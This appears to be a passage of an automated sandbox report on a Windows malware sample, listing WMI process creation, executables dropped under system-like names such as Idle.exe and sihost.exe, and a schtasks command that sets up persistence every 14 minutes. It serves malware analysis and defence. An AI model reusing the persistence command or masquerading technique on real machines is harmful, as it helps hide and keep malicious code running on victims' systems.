Source: F3ePjP272h.exe, jEVMrwiAv5kYZ8sPKn8.cs	High entropy of concatenated method names: 'DoYiwXf4Vw', 'N0Fi7trgHh', 'CwbixlhXp7', 'PpBiJPkVyK', 'de8iRlnGyI', 'wCGa391ceAVPRgLysKyF', 'FVLNyf1cLhpMJg3qLxY1', 'Fgip7i1cdE2wB8qSbXwn', 't6K1Dd1ctXfav0JspjWe', 'mjwekm1ch04d36SXcnin'

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\F3ePjP272h.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\cmd.exe

Executable created and started: C:\Windows\Speech\Engines\SR\Idle.exe

Source: C:\Users\user\Desktop\F3ePjP272h.exe	File created: C:\Users\user\Desktop\zjWVMLxf.log	Jump to dropped file
Source: C:\Windows\Speech\Engines\SR\Idle.exe	File created: C:\Users\user\Desktop\ViwkdMoR.log	Jump to dropped file
Source: C:\Users\user\Desktop\F3ePjP272h.exe	File created: C:\Users\user\Desktop\nHnXqlGz.log	Jump to dropped file
Source: C:\Windows\Speech\Engines\SR\Idle.exe	File created: C:\Users\user\Desktop\ECoURVov.log	Jump to dropped file
Source: C:\Users\user\Desktop\F3ePjP272h.exe	File created: C:\Program Files (x86)\Windows Mail\jmfWpjtPWHWFodUifDHiQtgxi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\F3ePjP272h.exe	File created: C:\Windows\Speech\Engines\SR\Idle.exe	Jump to dropped file
Source: C:\Users\user\Desktop\F3ePjP272h.exe	File created: C:\Program Files\MSBuild\Microsoft\jmfWpjtPWHWFodUifDHiQtgxi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\F3ePjP272h.exe	File created: C:\Users\user\Desktop\xpHnaOLh.log	Jump to dropped file
Source: C:\Windows\Speech\Engines\SR\Idle.exe	File created: C:\Users\user\Desktop\kvKyGzpq.log	Jump to dropped file
Source: C:\Windows\Speech\Engines\SR\Idle.exe	File created: C:\Users\user\Desktop\fRPzNptz.log	Jump to dropped file
Source: C:\Users\user\Desktop\F3ePjP272h.exe	File created: C:\Users\user\Desktop\AxEwwgFd.log	Jump to dropped file
Source: C:\Users\user\Desktop\F3ePjP272h.exe	File created: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Jump to dropped file
Source: C:\Users\user\Desktop\F3ePjP272h.exe	File created: C:\Users\Default\AppData\Local\Microsoft\Windows\INetCookies\sihost.exe	Jump to dropped file

Source: C:\Users\user\Desktop\F3ePjP272h.exe

File created: C:\Windows\Speech\Engines\SR\Idle.exe

Jump to dropped file

Source: C:\Users\user\Desktop\F3ePjP272h.exe	File created: C:\Users\user\Desktop\zjWVMLxf.log	Jump to dropped file
Source: C:\Users\user\Desktop\F3ePjP272h.exe	File created: C:\Users\user\Desktop\xpHnaOLh.log	Jump to dropped file
Source: C:\Users\user\Desktop\F3ePjP272h.exe	File created: C:\Users\user\Desktop\nHnXqlGz.log	Jump to dropped file
Source: C:\Users\user\Desktop\F3ePjP272h.exe	File created: C:\Users\user\Desktop\AxEwwgFd.log	Jump to dropped file
Source: C:\Windows\Speech\Engines\SR\Idle.exe	File created: C:\Users\user\Desktop\kvKyGzpq.log	Jump to dropped file
Source: C:\Windows\Speech\Engines\SR\Idle.exe	File created: C:\Users\user\Desktop\ECoURVov.log	Jump to dropped file
Source: C:\Windows\Speech\Engines\SR\Idle.exe	File created: C:\Users\user\Desktop\fRPzNptz.log	Jump to dropped file
Source: C:\Windows\Speech\Engines\SR\Idle.exe	File created: C:\Users\user\Desktop\ViwkdMoR.log	Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\F3ePjP272h.exe

Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jmfWpjtPWHWFodUifDHiQtgxij" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows mail\jmfWpjtPWHWFodUifDHiQtgxi.exe'" /f

Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\F3ePjP272h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Speech\Engines\SR\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Reference Assemblies\jmfWpjtPWHWFodUifDHiQtgxi.exe	Process information set: NOOPENFILEERRORBOX
